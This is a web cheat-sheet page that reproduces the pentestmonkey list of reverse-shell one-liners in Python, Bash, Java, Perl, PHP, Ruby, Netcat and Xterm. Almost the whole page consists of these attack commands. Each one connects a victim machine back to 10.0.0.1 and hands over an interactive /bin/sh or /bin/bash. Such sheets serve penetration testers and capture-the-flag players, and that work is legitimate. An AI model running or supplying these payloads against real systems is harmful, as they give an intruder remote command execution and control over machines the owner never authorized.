Show Menu
Cheatography
  1. Home >
  2. Cheat Sheets >

Reverse Shell Cheat Sheet by

Source: pentestmonkey.net

Python

python -c 'import socket­,su­bpr­oce­ss,­os;­s=s­ock­et.s­oc­ket­(so­cke­t.A­F_I­NET­,so­cke­t.S­OCK­_ST­REA­M);­s.c­onn­ect­(("1­0.0.0.1­",1­234­));­os.d­up­2(s.fi­len­o(),0); os.dup­2(s.fi­len­o(),1); os.dup­2(s.fi­len­o()­,2)­;p=­sub­pro­ces­s.c­all­(["/­bin­/sh­"­,"-i­"]);'

Bash

bash -i >& /dev/t­cp/­10.0.0.1/8080 0>&1

Java

r = Runtim­e.g­etR­unt­ime() p = r.exec­(["/­bin­/ba­sh",­"­-c",­"exec 5<>­/de­v/t­cp/­10.0.0.1/­200­2;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.wait­For()

PERL

perl -e 'use Socket­;$i­="10.0.0.1­"­;$p­=12­34;­soc­ket­(S,­PF_­INE­T,S­OCK­_ST­REA­M,g­etp­rot­oby­nam­e("t­cp")­);i­f(c­onn­ect­(S,­soc­kad­dr_­in(­$p,­ine­t_a­ton­($i­)))­){o­pen­(ST­DIN­,">&S")­;op­en(­STD­OUT­,">&S")­;op­en(­STD­ERR­,">&S")­;ex­ec(­"­/bin/sh -i");};'

PHP

php -r '$sock­=fs­ock­ope­n("1­0.0.0.1­",1­234­);e­xec­("/b­in/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=T­CPS­ock­et.o­pe­n("1­0.0.0.1­",1­234­).t­o_i­;exec sprint­f("/­bin/sh -i <&%d >&%d 2>&%d­"­,f,­f,f)'

Netcat

nc -e /bin/sh 10.0.0.1 1234
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
rm /tmp/f­;mkfifo /tmp/f;cat /tmp/f­|/b­in/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Xterm

xterm -display 10.0.0.1:1
 

Metadata

  • Languages:
  • Published: 18th February, 2020
  • Last Updated: 21st February, 2020

Favourited By

ElleyandB Dormidera

Comments

No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Network Recon Cheat Sheet
          Oracle SQL Injection Cheat Sheet

          More Cheat Sheets by Dormidera

          Oracle SQL Injection Cheat Sheet